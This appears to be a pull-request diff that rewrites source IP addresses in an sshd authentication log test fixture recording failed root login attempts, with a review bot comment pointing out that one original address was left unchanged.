"root" -Feb 22 17:00:15 slave22 sshd[3103]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root +Feb 22 17:00:15 slave22 sshd[3103]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root Feb 22 17:00:15 slave22 sshd[3103]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" Feb 22 17:00:15 slave22 sshd[3099]: Failed password for root from 223.99.60.46 port 31185 ssh2 Feb 22 17:00:16 slave22 sshd[3099]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 17:00:17 slave22 sshd[3103]: Failed password for root from 202.109.143.106 port 1807 ssh2 +Feb 22 17:00:17 slave22 sshd[3103]: Failed password for root from 202.196.224.106 port 1807 ssh2 Feb 22 17:00:17 slave22 sshd[3103]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" Feb 22 17:00:18 slave22 sshd[3099]: Failed password for root from 223.99.60.46 port 31185 ssh2 -Feb 22 17:00:18 slave22 sshd[3103]: Failed password for root from 202.109.143.106 port 1807 ssh2 +Feb 22 17:00:18 slave22 sshd[3103]: Failed password for root from 202.196.224.106 port 1807 ssh2 Feb 22 17:00:19 slave22 sshd[3103]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" Feb 22 17:00:19 slave22 sshd[3099]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 17:00:21 slave22 sshd[3103]: Failed password for root from 202.109.143.106 port 1807 ssh2 +Feb 22 17:00:21 slave22 sshd[3103]: Failed password for root from 202.196.224.106 port 1807 ssh2 Feb 22 17:00:21 slave22 sshd[3099]: Failed password for root from 223.99.60.46 port 31185 ssh2 Feb 22 17:00:21 slave22 sshd[3099]: Disconnecting: Too many authentication failures for root [preauth] Feb 22 17:00:21 slave22 sshd[3099]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.99.60.46 user=root Feb 22 17:00:21 
slave22 sshd[3099]: PAM service(sshd) ignoring max retries; 6 > 3 Feb 22 17:00:21 slave22 sshd[3103]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 17:00:23 slave22 sshd[3103]: Failed password for root from 202.109.143.106 port 1807 ssh2 +Feb 22 17:00:23 slave22 sshd[3103]: Failed password for root from 202.196.224.106 port 1807 ssh2 Feb 22 17:00:24 slave22 sshd[3103]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" Feb 22 17:00:24 slave22 sshd[3107]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.99.60.46 user=root Feb 22 17:00:24 slave22 sshd[3107]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 17:00:25 slave22 sshd[3103]: Failed password for root from 202.109.143.106 port 1807 ssh2 +Feb 22 17:00:25 slave22 sshd[3103]: Failed password for root from 202.196.224.106 port 1807 ssh2 Feb 22 17:00:26 slave22 sshd[3103]: fatal: Read from socket failed: Connection reset by peer [preauth] -Feb 22 17:00:26 slave22 sshd[3103]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root +Feb 22 17:00:26 slave22 sshd[3103]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root Feb 22 17:00:26 slave22 sshd[3103]: PAM service(sshd) ignoring max retries; 5 > 3 Feb 22 17:00:26 slave22 sshd[3107]: Failed password for root from 223.99.60.46 port 56365 ssh2 Feb 22 17:00:27 slave22 sshd[3107]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" 
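Review bot: The third client address in this hunk, 223.99.60.46 (for example the context line `Feb 22 16:59:45 slave22 sshd[3072]: Failed password for root from 223.99.60.46 port 4679 ssh2`), is left untouched while 116.31.116.27 and 202.109.143.106 are rewritten to 216.160.83.58 and 202.196.224.106, so the fixture ends up mixing substituted and original addresses. If the purpose of the rewrite is to move the sample onto addresses with stable test GeoIP data or to stop shipping real third-party hosts in test data, that address should be substituted in the same pass; if it is intentionally kept, a sentence in the PR description saying why would save the next reader the question. If an expected-output file accompanies this log, its `source.ip`/`related.ip` values for the rewritten lines will need regenerating to match, which I cannot confirm from this hunk.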
@@ -665,34 +665,34 @@ Feb 22 17:00:40 slave22 sshd[3107]: Failed password for root from 223.99.60.46 p Feb 22 17:00:40 slave22 sshd[3107]: Disconnecting: Too many authentication failures for root [preauth] Feb 22 17:00:40 slave22 sshd[3107]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.99.60.46 user=root Feb 22 17:00:40 slave22 sshd[3107]: PAM service(sshd) ignoring max retries; 6 > 3 -Feb 22 17:00:46 slave22 sshd[3115]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root +Feb 22 17:00:46 slave22 sshd[3115]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root Feb 22 17:00:46 slave22 sshd[3115]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 17:00:48 slave22 sshd[3119]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root +Feb 22 17:00:48 slave22 sshd[3119]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root Feb 22 17:00:48 slave22 sshd[3119]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 17:00:49 slave22 sshd[3115]: Failed password for root from 202.109.143.106 port 3310 ssh2 +Feb 22 17:00:49 slave22 sshd[3115]: Failed password for root from 202.196.224.106 port 3310 ssh2 Feb 22 17:00:49 slave22 sshd[3115]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 17:00:50 slave22 sshd[3119]: Failed password for root from 116.31.116.27 port 26757 ssh2 +Feb 22 17:00:50 slave22 sshd[3119]: Failed password for root from 216.160.83.58 port 26757 ssh2 Feb 22 17:00:50 slave22 sshd[3119]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 17:00:51 slave22 sshd[3115]: Failed password for root from 202.109.143.106 port 3310 ssh2 -Feb 22 17:00:52 slave22 sshd[3119]: 
Failed password for root from 116.31.116.27 port 26757 ssh2 +Feb 22 17:00:51 slave22 sshd[3115]: Failed password for root from 202.196.224.106 port 3310 ssh2 +Feb 22 17:00:52 slave22 sshd[3119]: Failed password for root from 216.160.83.58 port 26757 ssh2 Feb 22 17:00:52 slave22 sshd[3119]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" Feb 22 17:00:53 slave22 sshd[3115]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" Feb 22 17:00:53 slave22 sshd[3111]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.99.60.46 user=root Feb 22 17:00:53 slave22 sshd[3111]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 17:00:54 slave22 sshd[3119]: Failed password for root from 116.31.116.27 port 26757 ssh2 -Feb 22 17:00:54 slave22 sshd[3115]: Failed password for root from 202.109.143.106 port 3310 ssh2 -Feb 22 17:00:54 slave22 sshd[3119]: Received disconnect from 116.31.116.27: 11: [preauth] -Feb 22 17:00:54 slave22 sshd[3119]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root +Feb 22 17:00:54 slave22 sshd[3119]: Failed password for root from 216.160.83.58 port 26757 ssh2 +Feb 22 17:00:54 slave22 sshd[3115]: Failed password for root from 202.196.224.106 port 3310 ssh2 +Feb 22 17:00:54 slave22 sshd[3119]: Received disconnect from 216.160.83.58: 11: [preauth] +Feb 22 17:00:54 slave22 sshd[3119]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root Feb 22 17:00:54 slave22 sshd[3115]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" Feb 22 17:00:55 slave22 sshd[3111]: Failed password for root from 223.99.60.46 port 6597 ssh2 Feb 22 17:00:56 slave22 sshd[3111]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 17:00:56 slave22 sshd[3115]: Failed password for root from 202.109.143.106 port 
3310 ssh2 +Feb 22 17:00:56 slave22 sshd[3115]: Failed password for root from 202.196.224.106 port 3310 ssh2 Feb 22 17:00:57 slave22 sshd[3115]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" Feb 22 17:00:58 slave22 sshd[3111]: Failed password for root from 223.99.60.46 port 6597 ssh2 Feb 22 17:00:58 slave22 sshd[3111]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 17:01:00 slave22 sshd[3115]: Failed password for root from 202.109.143.106 port 3310 ssh2 +Feb 22 17:01:00 slave22 sshd[3115]: Failed password for root from 202.196.224.106 port 3310 ssh2 Feb 22 17:01:00 slave22 sshd[3115]: fatal: Read from socket failed: Connection reset by peer [preauth] -Feb 22 17:01:00 slave22 sshd[3115]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root +Feb 22 17:01:00 slave22 sshd[3115]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root Feb 22 17:01:00 slave22 sshd[3115]: PAM service(sshd) ignoring max retries; 5 > 3 Feb 22 17:01:01 slave22 sshd[3111]: Failed password for root from 223.99.60.46 port 6597 ssh2 Feb 22 17:01:02 slave22 sshd[3111]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" 
@@ -704,25 +704,25 @@ Feb 22 17:01:09 slave22 sshd[3111]: Failed password for root from 223.99.60.46 p Feb 22 17:01:09 slave22 sshd[3111]: Disconnecting: Too many authentication failures for root [preauth] Feb 22 17:01:09 slave22 sshd[3111]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.99.60.46 user=root Feb 22 17:01:09 slave22 sshd[3111]: PAM service(sshd) ignoring max retries; 6 > 3 -Feb 22 17:01:12 slave22 sshd[3192]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root +Feb 22 17:01:12 slave22 sshd[3192]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root Feb 22 17:01:12 slave22 sshd[3192]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 17:01:14 slave22 sshd[3192]: Failed password for root from 202.109.143.106 port 4288 ssh2 +Feb 22 17:01:14 slave22 sshd[3192]: Failed password for root from 202.196.224.106 port 4288 ssh2 Feb 22 17:01:15 slave22 sshd[3192]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 17:01:17 slave22 sshd[3192]: Failed password for root from 202.109.143.106 port 4288 ssh2 +Feb 22 17:01:17 slave22 sshd[3192]: Failed password for root from 202.196.224.106 port 4288 ssh2 Feb 22 17:01:17 slave22 sshd[3192]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" Feb 22 17:01:19 slave22 sshd[3188]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.99.60.46 user=root Feb 22 17:01:19 slave22 sshd[3188]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 17:01:19 slave22 sshd[3192]: Failed password for root from 202.109.143.106 port 4288 ssh2 +Feb 22 17:01:19 slave22 sshd[3192]: Failed password for root from 202.196.224.106 port 4288 ssh2 Feb 22 17:01:21 slave22 sshd[3192]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" 
not met by user "root" Feb 22 17:01:21 slave22 sshd[3188]: Failed password for root from 223.99.60.46 port 37514 ssh2 Feb 22 17:01:22 slave22 sshd[3188]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 17:01:23 slave22 sshd[3192]: Failed password for root from 202.109.143.106 port 4288 ssh2 +Feb 22 17:01:23 slave22 sshd[3192]: Failed password for root from 202.196.224.106 port 4288 ssh2 Feb 22 17:01:23 slave22 sshd[3192]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" Feb 22 17:01:24 slave22 sshd[3188]: Failed password for root from 223.99.60.46 port 37514 ssh2 Feb 22 17:01:25 slave22 sshd[3188]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 17:01:25 slave22 sshd[3192]: Failed password for root from 202.109.143.106 port 4288 ssh2 +Feb 22 17:01:25 slave22 sshd[3192]: Failed password for root from 202.196.224.106 port 4288 ssh2 Feb 22 17:01:25 slave22 sshd[3192]: fatal: Read from socket failed: Connection reset by peer [preauth] -Feb 22 17:01:25 slave22 sshd[3192]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root +Feb 22 17:01:25 slave22 sshd[3192]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root Feb 22 17:01:25 slave22 sshd[3192]: PAM service(sshd) ignoring max retries; 5 > 3 Feb 22 17:01:26 slave22 sshd[3188]: Failed password for root from 223.99.60.46 port 37514 ssh2 Feb 22 17:01:27 slave22 sshd[3188]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" 
@@ -734,38 +734,38 @@ Feb 22 17:01:34 slave22 sshd[3188]: Failed password for root from 223.99.60.46 p Feb 22 17:01:34 slave22 sshd[3188]: Disconnecting: Too many authentication failures for root [preauth] Feb 22 17:01:34 slave22 sshd[3188]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.99.60.46 user=root Feb 22 17:01:34 slave22 sshd[3188]: PAM service(sshd) ignoring max retries; 6 > 3 -Feb 22 17:01:46 slave22 sshd[3200]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root +Feb 22 17:01:46 slave22 sshd[3200]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root Feb 22 17:01:46 slave22 sshd[3200]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" Feb 22 17:01:47 slave22 sshd[3196]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.99.60.46 user=root Feb 22 17:01:47 slave22 sshd[3196]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 17:01:47 slave22 sshd[3200]: Failed password for root from 116.31.116.27 port 36880 ssh2 +Feb 22 17:01:47 slave22 sshd[3200]: Failed password for root from 216.160.83.58 port 36880 ssh2 Feb 22 17:01:48 slave22 sshd[3200]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" Feb 22 17:01:49 slave22 sshd[3196]: Failed password for root from 223.99.60.46 port 55116 ssh2 -Feb 22 17:01:49 slave22 sshd[3200]: Failed password for root from 116.31.116.27 port 36880 ssh2 +Feb 22 17:01:49 slave22 sshd[3200]: Failed password for root from 216.160.83.58 port 36880 ssh2 Feb 22 17:01:49 slave22 sshd[3196]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" Feb 22 17:01:49 slave22 sshd[3200]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 17:01:49 slave22 sshd[3204]: pam_unix(sshd:auth): authentication failure; 
logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root +Feb 22 17:01:49 slave22 sshd[3204]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root Feb 22 17:01:49 slave22 sshd[3204]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" Feb 22 17:01:51 slave22 sshd[3196]: Failed password for root from 223.99.60.46 port 55116 ssh2 -Feb 22 17:01:51 slave22 sshd[3200]: Failed password for root from 116.31.116.27 port 36880 ssh2 -Feb 22 17:01:51 slave22 sshd[3204]: Failed password for root from 202.109.143.106 port 3480 ssh2 +Feb 22 17:01:51 slave22 sshd[3200]: Failed password for root from 216.160.83.58 port 36880 ssh2 +Feb 22 17:01:51 slave22 sshd[3204]: Failed password for root from 202.196.224.106 port 3480 ssh2 Feb 22 17:01:51 slave22 sshd[3204]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" Feb 22 17:01:52 slave22 sshd[3196]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 17:01:53 slave22 sshd[3204]: Failed password for root from 202.109.143.106 port 3480 ssh2 +Feb 22 17:01:53 slave22 sshd[3204]: Failed password for root from 202.196.224.106 port 3480 ssh2 Feb 22 17:01:53 slave22 sshd[3204]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 17:01:53 slave22 sshd[3200]: Received disconnect from 116.31.116.27: 11: [preauth] -Feb 22 17:01:53 slave22 sshd[3200]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root +Feb 22 17:01:53 slave22 sshd[3200]: Received disconnect from 216.160.83.58: 11: [preauth] +Feb 22 17:01:53 slave22 sshd[3200]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root Feb 22 17:01:54 slave22 sshd[3196]: Failed password for root from 223.99.60.46 port 55116 ssh2 Feb 22 17:01:55 slave22 sshd[3196]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not 
met by user "root" -Feb 22 17:01:55 slave22 sshd[3204]: Failed password for root from 202.109.143.106 port 3480 ssh2 +Feb 22 17:01:55 slave22 sshd[3204]: Failed password for root from 202.196.224.106 port 3480 ssh2 Feb 22 17:01:56 slave22 sshd[3204]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" Feb 22 17:01:57 slave22 sshd[3196]: Failed password for root from 223.99.60.46 port 55116 ssh2 -Feb 22 17:01:57 slave22 sshd[3204]: Failed password for root from 202.109.143.106 port 3480 ssh2 +Feb 22 17:01:57 slave22 sshd[3204]: Failed password for root from 202.196.224.106 port 3480 ssh2 Feb 22 17:01:58 slave22 sshd[3204]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" Feb 22 17:01:58 slave22 sshd[3196]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 17:01:59 slave22 sshd[3204]: Failed password for root from 202.109.143.106 port 3480 ssh2 +Feb 22 17:01:59 slave22 sshd[3204]: Failed password for root from 202.196.224.106 port 3480 ssh2 Feb 22 17:02:00 slave22 sshd[3204]: fatal: Read from socket failed: Connection reset by peer [preauth] -Feb 22 17:02:00 slave22 sshd[3204]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root +Feb 22 17:02:00 slave22 sshd[3204]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root Feb 22 17:02:00 slave22 sshd[3204]: PAM service(sshd) ignoring max retries; 5 > 3 Feb 22 17:02:00 slave22 sshd[3196]: Failed password for root from 223.99.60.46 port 55116 ssh2 Feb 22 17:02:01 slave22 sshd[3196]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" 
@@ -785,79 +785,79 @@ Feb 22 17:02:24 slave22 sshd[3216]: Failed password for root from 223.99.60.46 p
 Feb 22 17:02:24 slave22 sshd[3216]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:02:26 slave22 sshd[3216]: Failed password for root from 223.99.60.46 port 22291 ssh2
 Feb 22 17:02:27 slave22 sshd[3216]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:02:27 slave22 sshd[3220]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 17:02:27 slave22 sshd[3220]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 17:02:27 slave22 sshd[3220]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:02:29 slave22 sshd[3216]: Failed password for root from 223.99.60.46 port 22291 ssh2
 Feb 22 17:02:29 slave22 sshd[3216]: Disconnecting: Too many authentication failures for root [preauth]
 Feb 22 17:02:29 slave22 sshd[3216]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.99.60.46 user=root
 Feb 22 17:02:29 slave22 sshd[3216]: PAM service(sshd) ignoring max retries; 6 > 3
-Feb 22 17:02:29 slave22 sshd[3220]: Failed password for root from 202.109.143.106 port 1203 ssh2
+Feb 22 17:02:29 slave22 sshd[3220]: Failed password for root from 202.196.224.106 port 1203 ssh2
 Feb 22 17:02:29 slave22 sshd[3220]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:02:31 slave22 sshd[3220]: Failed password for root from 202.109.143.106 port 1203 ssh2
+Feb 22 17:02:31 slave22 sshd[3220]: Failed password for root from 202.196.224.106 port 1203 ssh2
 Feb 22 17:02:31 slave22 sshd[3220]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:02:33 slave22 sshd[3220]: Failed password for root from 202.109.143.106 port 1203 ssh2
+Feb 22 17:02:33 slave22
sshd[3220]: Failed password for root from 202.196.224.106 port 1203 ssh2
 Feb 22 17:02:33 slave22 sshd[3220]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:02:36 slave22 sshd[3220]: Failed password for root from 202.109.143.106 port 1203 ssh2
+Feb 22 17:02:36 slave22 sshd[3220]: Failed password for root from 202.196.224.106 port 1203 ssh2
 Feb 22 17:02:36 slave22 sshd[3220]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:02:37 slave22 sshd[3220]: Failed password for root from 202.109.143.106 port 1203 ssh2
+Feb 22 17:02:37 slave22 sshd[3220]: Failed password for root from 202.196.224.106 port 1203 ssh2
 Feb 22 17:02:38 slave22 sshd[3220]: fatal: Read from socket failed: Connection reset by peer [preauth]
-Feb 22 17:02:38 slave22 sshd[3220]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 17:02:38 slave22 sshd[3220]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 17:02:38 slave22 sshd[3220]: PAM service(sshd) ignoring max retries; 5 > 3
 Feb 22 17:02:38 slave22 sshd[3224]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.99.60.46 user=root
 Feb 22 17:02:38 slave22 sshd[3224]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:02:39 slave22 sshd[3232]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 17:02:39 slave22 sshd[3232]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 17:02:39 slave22 sshd[3232]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:02:39 slave22 sshd[3228]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root
+Feb 22 17:02:39
slave22 sshd[3228]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root
 Feb 22 17:02:39 slave22 sshd[3228]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:02:39 slave22 sshd[3224]: Failed password for root from 223.99.60.46 port 46820 ssh2
 Feb 22 17:02:40 slave22 sshd[3224]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:02:42 slave22 sshd[3232]: Failed password for root from 202.109.143.106 port 1140 ssh2
+Feb 22 17:02:42 slave22 sshd[3232]: Failed password for root from 202.196.224.106 port 1140 ssh2
 Feb 22 17:02:42 slave22 sshd[3232]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:02:42 slave22 sshd[3228]: Failed password for root from 116.31.116.27 port 30327 ssh2
+Feb 22 17:02:42 slave22 sshd[3228]: Failed password for root from 216.160.83.58 port 30327 ssh2
 Feb 22 17:02:42 slave22 sshd[3224]: Failed password for root from 223.99.60.46 port 46820 ssh2
 Feb 22 17:02:42 slave22 sshd[3228]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:02:43 slave22 sshd[3224]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:02:43 slave22 sshd[3232]: Failed password for root from 202.109.143.106 port 1140 ssh2
+Feb 22 17:02:43 slave22 sshd[3232]: Failed password for root from 202.196.224.106 port 1140 ssh2
 Feb 22 17:02:44 slave22 sshd[3232]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:02:44 slave22 sshd[3228]: Failed password for root from 116.31.116.27 port 30327 ssh2
+Feb 22 17:02:44 slave22 sshd[3228]: Failed password for root from 216.160.83.58 port 30327 ssh2
 Feb 22 17:02:44 slave22 sshd[3228]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:02:44 slave22 sshd[3224]: Failed password for root from 223.99.60.46 port 46820 ssh2
 Feb 22 17:02:45
slave22 sshd[3224]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:02:46 slave22 sshd[3232]: Failed password for root from 202.109.143.106 port 1140 ssh2
+Feb 22 17:02:46 slave22 sshd[3232]: Failed password for root from 202.196.224.106 port 1140 ssh2
 Feb 22 17:02:46 slave22 sshd[3232]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:02:46 slave22 sshd[3228]: Failed password for root from 116.31.116.27 port 30327 ssh2
-Feb 22 17:02:47 slave22 sshd[3228]: Received disconnect from 116.31.116.27: 11: [preauth]
-Feb 22 17:02:47 slave22 sshd[3228]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root
+Feb 22 17:02:46 slave22 sshd[3228]: Failed password for root from 216.160.83.58 port 30327 ssh2
+Feb 22 17:02:47 slave22 sshd[3228]: Received disconnect from 216.160.83.58: 11: [preauth]
+Feb 22 17:02:47 slave22 sshd[3228]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root
 Feb 22 17:02:47 slave22 sshd[3224]: Failed password for root from 223.99.60.46 port 46820 ssh2
 Feb 22 17:02:48 slave22 sshd[3224]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:02:48 slave22 sshd[3232]: Failed password for root from 202.109.143.106 port 1140 ssh2
+Feb 22 17:02:48 slave22 sshd[3232]: Failed password for root from 202.196.224.106 port 1140 ssh2
 Feb 22 17:02:49 slave22 sshd[3232]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:02:49 slave22 sshd[3224]: Failed password for root from 223.99.60.46 port 46820 ssh2
 Feb 22 17:02:50 slave22 sshd[3224]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:02:51 slave22 sshd[3232]: Failed password for root from 202.109.143.106 port 1140 ssh2
+Feb 22 17:02:51 slave22 sshd[3232]: Failed password for root from 202.196.224.106 port 1140 ssh2
 Feb 22 17:02:51
slave22 sshd[3232]: fatal: Read from socket failed: Connection reset by peer [preauth]
-Feb 22 17:02:51 slave22 sshd[3232]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 17:02:51 slave22 sshd[3232]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 17:02:51 slave22 sshd[3232]: PAM service(sshd) ignoring max retries; 5 > 3
 Feb 22 17:02:52 slave22 sshd[3224]: Failed password for root from 223.99.60.46 port 46820 ssh2
 Feb 22 17:02:52 slave22 sshd[3224]: Disconnecting: Too many authentication failures for root [preauth]
 Feb 22 17:02:52 slave22 sshd[3224]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.99.60.46 user=root
 Feb 22 17:02:52 slave22 sshd[3224]: PAM service(sshd) ignoring max retries; 6 > 3
-Feb 22 17:02:52 slave22 sshd[3244]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 17:02:52 slave22 sshd[3244]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 17:02:52 slave22 sshd[3244]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
